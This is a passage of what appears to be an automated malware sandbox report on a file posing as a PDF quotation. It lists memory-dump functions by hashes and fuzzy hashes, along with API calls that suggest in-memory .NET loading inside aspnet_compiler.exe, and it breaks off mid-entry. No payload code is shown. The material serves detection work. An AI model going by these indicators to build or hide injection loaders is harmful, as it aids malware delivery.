Opcode ID: fa15d984dc3c2f70286fb62daa4cc478b6e7b1fc3cf41f758b444c6b78f98595
Instruction ID: 135a40f92688befdaf4e6859329eeda68ed9354fd97311d986c5cbf33690848f
Opcode Fuzzy Hash: fa15d984dc3c2f70286fb62daa4cc478b6e7b1fc3cf41f758b444c6b78f98595
Instruction Fuzzy Hash: 71E01A3060D9884FCF59EB1CC454B95BBF1FF58300F0442DA9089DB266CA30D981CB40

Function 00007FF848E63033 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff2ebc946e260d9b437f09579269165a8fd363eb8c25bfb85626941724932fb
Instruction ID: 37dc69c2b4c62ebf6008cf8138524d4d076b09198bd505a925d1324be256dcac
Opcode Fuzzy Hash: aff2ebc946e260d9b437f09579269165a8fd363eb8c25bfb85626941724932fb
Instruction Fuzzy Hash: 11E0863120C6058FE325BA20D8546A533A5FB51351F540A3AD806D72E5DF39F590C705

Function 00007FF848E61E8D Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42e75d585d82d9cb8c74df7046674c92400a84f00e4449e2176579761d94651
Instruction ID: fdcd290d28a1a117e55a150004433ccc757ffc61c8b8cb85a7fac52234cf6d58
Opcode Fuzzy Hash: c42e75d585d82d9cb8c74df7046674c92400a84f00e4449e2176579761d94651
Instruction Fuzzy Hash: 6EC048B378E6290D754C254CBC030F8B3C0C68357169426BFEA8B819ABA88B25A70089

Function 00007FF848E64F4F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f6be6435e59b9f247079e8021967e3e1894d120ab0b0909e4aae1a89f3a9fa
Instruction ID: af2823ce0907651a6f789652e39e24656107d5e13c86050dc59a9b3982617e06
Opcode Fuzzy Hash: 27f6be6435e59b9f247079e8021967e3e1894d120ab0b0909e4aae1a89f3a9fa
Instruction Fuzzy Hash: 9ED0123060C4064FF728B544D5502B93291FB543A5F641636D11AD25D6EEAC7502869D

Function 00007FF848E623FF Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc6ca63f7709607e0bb9a348ebd524d0eb51bb3edb354214a479d691a682661
Instruction ID: c945a61387b5cfb2efdcd0b10d39a89d1a71bc81d3f3d2708e88c2db8b20d497
Opcode Fuzzy Hash: 2cc6ca63f7709607e0bb9a348ebd524d0eb51bb3edb354214a479d691a682661
Instruction Fuzzy Hash: 4CE0BF3554C40B8FEB94FA50C454DAC7391FB60351F940275D505E72A6DF78B9414B44

Function 00007FF8490866CA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb4e90f35c0c4a8e4a4bfc04d72bff313cf3e423d73a1517faca6f1d385c139
Instruction ID: 188626b2b3fba24d54014c4c186ac699407e588cbe808e941abb84fd29c0931b
Opcode Fuzzy Hash: beb4e90f35c0c4a8e4a4bfc04d72bff313cf3e423d73a1517faca6f1d385c139
Instruction Fuzzy Hash: CED0A774854A4C4FCF40FF54E401499B3B0FB48304F400655EC1CC3241D735A6B2C741

Function 00007FF848E60C26 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce9539f8b72984ad2a7d9e763dddea9e41170e1a30ed115e456398c9d4ba7f1
Instruction ID: 20cf7c01ffa27384817e754b2d9b5268894f5830ad81017981400e1ad8a03f5a
Opcode Fuzzy Hash: 8ce9539f8b72984ad2a7d9e763dddea9e41170e1a30ed115e456398c9d4ba7f1
Instruction Fuzzy Hash: E2D0231390D54E0DE7D4BD4C70442E41740FF503F4FD40173C44C71142DE3461510145

Function 00007FF84909E9E3 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3d9bd94f3ca71818e8e927679d212a2bfc795a644b16f9e770b404ecbb88f9
Instruction ID: e135ffd86fc61c85177187ee00e2ec678f7f1aee676776b5111ab9d7b1d43fda
Opcode Fuzzy Hash: 3d3d9bd94f3ca71818e8e927679d212a2bfc795a644b16f9e770b404ecbb88f9
Instruction Fuzzy Hash: A7D0A76180E5C59FD24AD77800665E47BC0AF05100F4802FDD0898B5A3C81C15484715

Function 00007FF848E60DE4 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 209474151dabefd1f8caa4d3ed0116c677b17f14858fa9bcac594f20a74c4598
Instruction ID: 0f92b5aeafdb8bcfb47896767b7160947bd395534a88f90cc762e57f4b401ec7
Opcode Fuzzy Hash: 209474151dabefd1f8caa4d3ed0116c677b17f14858fa9bcac594f20a74c4598
Instruction Fuzzy Hash: EAA01233E88039848F11608474000FDB710E7C0261F840033C31DA1000462120244180

Function 00007FF849082D10 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c30f6b02850c6029215491cb25f5d9d3ef5146546d4261dc56949950e0b45b4
Instruction ID: a158b119c2ab9cf7290b279a7b0d02cb794f8b6998034298709323a6ea7c23bc
Opcode Fuzzy Hash: 7c30f6b02850c6029215491cb25f5d9d3ef5146546d4261dc56949950e0b45b4
Instruction Fuzzy Hash: 32B01261049D112EF21A6598F401CF41780EEC0320708DBA3D0048D0D687355C810898

Function 00007FF8490822ED Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d7373e6277d098714649629a66d005bc59878acaeb1c54eaa1f0ba35b251ab
Instruction ID: 61214429499803f1cc18a16a123e7f8e4db062391d4b0139723585d8a84ca284
Opcode Fuzzy Hash: 69d7373e6277d098714649629a66d005bc59878acaeb1c54eaa1f0ba35b251ab
Instruction Fuzzy Hash: 339002C158D95238561C35A9F0020E90340AB413A4F08A177D408480870D08144214A9

Non-executed Functions

Function 00007FF849080188 Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

w,_H, xrefs: 00007FF84908AD74

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: w,_H
API String ID: 0-2749329540
Opcode ID: 01ce7c58d6ab0965a2f620760e0427160b00df21359605c89ab1fa36a605fda1
Instruction ID: cf5291a9ed51c4a1851064ace5d1e3a76af7c4c45ce506165a3251e1cbffada6
Opcode Fuzzy Hash: 01ce7c58d6ab0965a2f620760e0427160b00df21359605c89ab1fa36a605fda1
Instruction Fuzzy Hash: 88D13531B0DD8A4FEBA5EB2C94586B577E1FF59350B0A41BAC04EC7593DE28EC428741

Function 00007FF849089978 Relevance: .9, Instructions: 922COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bba9b4af1023a0f70702b16359287efbd3e0600acc42b8ab592f451b7155a114
Instruction ID: db064dd29161e9e99cb12b294130b16a8d2e658435a51b7dd7c14f2ba3add600
Opcode Fuzzy Hash: bba9b4af1023a0f70702b16359287efbd3e0600acc42b8ab592f451b7155a114
Instruction Fuzzy Hash: A152503061CA898FDBA8EB2C84597A9B7E1FF99340F5545BDD08DC72A2DE34E841CB41

Function 00007FF848E6BCFB Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179cdce18ae70f37fe8bb9488214a68d6ecf6148805c5a4fe7645703b9005893
Instruction ID: 28ac25495dbcab4e1904efe7ca499929d5aca8a301fc2fd33b929fb9df5d23ed
Opcode Fuzzy Hash: 179cdce18ae70f37fe8bb9488214a68d6ecf6148805c5a4fe7645703b9005893
Instruction Fuzzy Hash: 9151D4B799CB626DD729BBB8B4921F9B790EF40374F08893BC2C989043DE1470418ADD

Function 00007FF84909D3C2 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ed8cfee27fd084a658ab5e055787d9db7628bc599a2ef3fe7c65282b417362
Instruction ID: 283780f0b2a53f1ea458ad038c466d080a08643ac8e1eb4e794ff579124cfbc9
Opcode Fuzzy Hash: 94ed8cfee27fd084a658ab5e055787d9db7628bc599a2ef3fe7c65282b417362
Instruction Fuzzy Hash: 56F0F630D4C619CFDB64EE44D880AECB3B5EB59745F10922AD009A3291CB38A544CB44

Analysis Process: aspnet_compiler.exePID: 2928, Parent PID: 828COMMON

Execution Graph

Execution Coverage:	22.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	60
Total number of Limit Nodes:	2

Executed Functions

Function 000002589371279C Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002589371280F

Memory Dump Source

Source File: 00000004.00000002.3366738484.00000258936F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000258936F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_258936f0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4c39121e2575ee33ecb4d73f15452246ace4c814b5d9a0cedab60eb3671f6415
Instruction ID: 02ba9ca1bbc841f08fa6abf54d7962a5ef1e77d59c3d215f841a06fa1e1cc434
Opcode Fuzzy Hash: 4c39121e2575ee33ecb4d73f15452246ace4c814b5d9a0cedab60eb3671f6415
Instruction Fuzzy Hash: 15C1C936324D056BEB6AEA688CC97BAB3D1FB58306F140179D84AD3386DF70D942C785

Function 00007FF848F39E4D Relevance: .3, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777f9308096114ae7520ca7cd1e3058c7140ee14824bab980bab3a092d29d03a
Instruction ID: 06747a4af9ad9f413eea6e23b998e6e58b3a3e00f2b1f7b1845f937097b4da0f
Opcode Fuzzy Hash: 777f9308096114ae7520ca7cd1e3058c7140ee14824bab980bab3a092d29d03a
Instruction Fuzzy Hash: 04A13870D08A0A8FEB94EF68C854BE9B7B1FF58340F1042A9D01DE32D5CB389985CB55

Function 00007FF848F3994B Relevance: .3, Instructions: 270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3736879312cd101c3375f905e8761d25a93cb9e5ed1d987c2306cf9b350baa28
Instruction ID: a31c8bf4e18781381d7b5ce9d2e3cf3dd38ec15955ee3933326f7b7a30efdd2c
Opcode Fuzzy Hash: 3736879312cd101c3375f905e8761d25a93cb9e5ed1d987c2306cf9b350baa28
Instruction Fuzzy Hash: 0AA14C70919A5D9FDB55EF688855BEDBBF0EF1A301F5001AAD04DE7292CB38A981CB04

Function 00007FF848F39D54 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f8bd017a33bc9a5825c2eec030e86044828659e11c7e3928995c196779dc5a
Instruction ID: 7c54c71d35942cfce964d18809c62abf8f49725e5e9961063af1c307f64ac6c6
Opcode Fuzzy Hash: 21f8bd017a33bc9a5825c2eec030e86044828659e11c7e3928995c196779dc5a
Instruction Fuzzy Hash: C2612A7091965D9FDB55EB688855BEDBBF0EF1A301F5004AAD04DE72A2CB38A9C1CB04

Function 00007FF848F37419 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc68214576e2d3a8684cf53c167596eef8a00a8c1071ff4a61facf7635587835
Instruction ID: b263c7c7a2b9eeadca3aafe98076f37327a39b40a3fb7375dbca9d378803762c
Opcode Fuzzy Hash: bc68214576e2d3a8684cf53c167596eef8a00a8c1071ff4a61facf7635587835
Instruction Fuzzy Hash: C1312430E0C55D9FEB58EBA8D494BBDB7B1EF19350F5011BAD00DA3291CB38A981CB08

Function 00007FF848F3A151 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38d0e999fb520376041db005900ec18d7330864d7998e8690a81fdb794dea424
Instruction ID: 130d245d5a27baba141662e17b4f8b02d2084f890570cc350ac62af8787853a6
Opcode Fuzzy Hash: 38d0e999fb520376041db005900ec18d7330864d7998e8690a81fdb794dea424
Instruction Fuzzy Hash: 7F012830C1861A8EEB54EF65C4407FDB3B1EF85354F00813AC118A71D5CB799589CF94

Function 0000025893712566 Relevance: 4.7, APIs: 3, Instructions: 226
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 0000025893712574
SysAllocString.OLEAUT32 ref: 0000025893712690
SafeArrayDestroy.OLEAUT32 ref: 0000025893712774

Memory Dump Source

Source File: 00000004.00000002.3366738484.00000258936F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000258936F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_258936f0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: 78faeb35fc0397a27e01a32847bd3283859f90faad04a2c4a1f69deb921bc683
Instruction ID: a7e3d8dcaf350b0e4924993f687a3951fe6669506726e5830d42223cf888a4a4
Opcode Fuzzy Hash: 78faeb35fc0397a27e01a32847bd3283859f90faad04a2c4a1f69deb921bc683
Instruction Fuzzy Hash: 6F716D35228E049FD769EF28C8897A6B7E0FF99305F00466DD49AC7290DF30E505CB85

Function 0000025893713FB4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000025893714082

Strings

l, xrefs: 000002589371401C

Memory Dump Source

Source File: 00000004.00000002.3366738484.00000258936F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000258936F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_258936f0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: 37320730b25b7f39d6e2c1efa6da006747aab150fd11b1cee1642d7544c55e01
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: AA31EC25628E895FE756DB2DC448B22BBE4FBA5309F2446BCC0CAC3253DF70C4068705

Function 0000025893712528 Relevance: 1.6, APIs: 1, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 0000025893712574
SysAllocString.OLEAUT32 ref: 0000025893712690
SafeArrayDestroy.OLEAUT32 ref: 0000025893712774

Memory Dump Source

Source File: 00000004.00000002.3366738484.00000258936F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000258936F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_258936f0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: 511fa94d881ec155df6223e272fba4e8aa052548a12f443dd6c152ec148112ed
Instruction ID: 399dc1c6ba54c412bb18b2036614066506ccb294a38d04b64500e0260864c06b
Opcode Fuzzy Hash: 511fa94d881ec155df6223e272fba4e8aa052548a12f443dd6c152ec148112ed
Instruction Fuzzy Hash: CA418F36228E089FD758EE24D8896A6B3E4FB95315F00462ED48AC7191EF31E5058BC6

Function 00007FF848F34D39 Relevance: .3, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 960ba68bf3e7d7b1ab21b685a009b30989cab728b2791555e02d8097948d5886
Instruction ID: 51daa61a1686d7036c611b029804c57c8cd6ac91cf438748e94897ed13580056
Opcode Fuzzy Hash: 960ba68bf3e7d7b1ab21b685a009b30989cab728b2791555e02d8097948d5886
Instruction Fuzzy Hash: AD91B470A08A1D9FDF94EF68D859BA9BBF1FF69311F0401AAD00DE7251DB34A885CB40

Function 00007FF848F35228 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0e5ce03e8003f5005add143caa19bac2356e4b895640c1f4101c1ac635662b
Instruction ID: 1d4b4c89031adf1a4421bf84ba79a49a629e4eee15d2d8b2f365e304d6372336
Opcode Fuzzy Hash: 9d0e5ce03e8003f5005add143caa19bac2356e4b895640c1f4101c1ac635662b
Instruction Fuzzy Hash: 106175B28EF25B6DE216336864AA0FE2650DF8B394F886E77E84C550D34F8D700541AC

Function 00007FF848F34DA2 Relevance: .2, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eadd95a81db388f41e0a8fb196f338c65caabd639f10805a108c3ca34141139
Instruction ID: 867f192d776df5cc0eaa86bae0b84f1b71cc00e928300b66c6932fc45674da4a
Opcode Fuzzy Hash: 6eadd95a81db388f41e0a8fb196f338c65caabd639f10805a108c3ca34141139
Instruction Fuzzy Hash: FF91EB30909A5D9FDB94EF68C859BACBBF1FF69301F0441AAD04DE7252DB34A885CB41

Function 00007FF848F35230 Relevance: .2, Instructions: 239
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730856db953e670319bc487e32ee7ca5adaed9a1c27ea9eb0ec38df15134530a
Instruction ID: c0ebda16cf34efa68092f2b5a28abf154d7e93ab1ab7b84e383650d569d9e6f7
Opcode Fuzzy Hash: 730856db953e670319bc487e32ee7ca5adaed9a1c27ea9eb0ec38df15134530a
Instruction Fuzzy Hash: 556165B28EF25B6DE216337864AA1FE2650DF8B394F886D77E84C550D34F8D700541AC

Function 00007FF848F34200 Relevance: .2, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64acaa6908e43acc5ae70b40970938cc94da28354314b96fdee1a5efa3792aeb
Instruction ID: 01311274b79894aa64e1aa69bf1d8496ebbec007a944a4d8fe5933896cf15907
Opcode Fuzzy Hash: 64acaa6908e43acc5ae70b40970938cc94da28354314b96fdee1a5efa3792aeb
Instruction Fuzzy Hash: C8813B7091D95D8FDB94EBA8C495BA9BBF1FF69300F5001EAC04DE7291CB34A881CB05

Function 00007FF848F35250 Relevance: .2, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e877c959fcec9067dd4ea6495077e985be21ad0336cc370f2f20c8ea2a98885
Instruction ID: ff6e4e83b530648cfe5980c64b59ca359062b1903eb6554d511b6c710107875e
Opcode Fuzzy Hash: 1e877c959fcec9067dd4ea6495077e985be21ad0336cc370f2f20c8ea2a98885
Instruction Fuzzy Hash: 455165B28EF25B6DE216737824AA1FE2650DF8B395F846D77E84C550D38F8D700942AC

Function 00007FF848F331F5 Relevance: .2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12f28d954418cb3ccb1fd31be62edcd52c5f8ef32943f0cec72214cea7bcf37
Instruction ID: b78068569dc0affeb555f2396beff71a784fdcd10b1e761a211e435a7bc7c7e0
Opcode Fuzzy Hash: d12f28d954418cb3ccb1fd31be62edcd52c5f8ef32943f0cec72214cea7bcf37
Instruction Fuzzy Hash: 52810670908A5C8FDB94EB68D499BA9BBF1FF59300F1041EED04EE7291CB34A985CB05

Function 00007FF848F339E1 Relevance: .2, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab354f2dabeca8bf9c8aa7cde38e055af61883d6cdcfc2319553426df324c20
Instruction ID: e71bb21b97ce3176304b4e1185983cbed9b69a22272854a7d0d514b7a5315089
Opcode Fuzzy Hash: 3ab354f2dabeca8bf9c8aa7cde38e055af61883d6cdcfc2319553426df324c20
Instruction Fuzzy Hash: F0815C7090C95C8FDB98EB68D895BA9BBF1FF59340F1040EAD04EE7291CB34A985CB05

Function 00007FF848F34A55 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b249486e7f5bc8d529ba51d4a5a4a05bb19b6371b409fcb5734c8b1050b72c49
Instruction ID: 5c0914998a5371992105655e08e8a9bef2b058376bab7d63694d47123824652e
Opcode Fuzzy Hash: b249486e7f5bc8d529ba51d4a5a4a05bb19b6371b409fcb5734c8b1050b72c49
Instruction Fuzzy Hash: E1813C7090CA5C8FDB94EBA8C494BA9BBF1FF69340F5040EAD04DE7291CB349985CB05

Function 00007FF848F33605 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc9ca613d8c3535b9dd739a6f21e327a05fcca2233b24bfd870eb1fab3313554
Instruction ID: dfc1028c1086f74f95123d75921387d78a99ea881e07501838c830082a0b035a
Opcode Fuzzy Hash: cc9ca613d8c3535b9dd739a6f21e327a05fcca2233b24bfd870eb1fab3313554
Instruction Fuzzy Hash: 15815BB090CA5D8FDB94EB68D495BA9BBF1FF59300F1000EAD04EE7291CB34A985CB05

Function 00007FF848F31E72 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

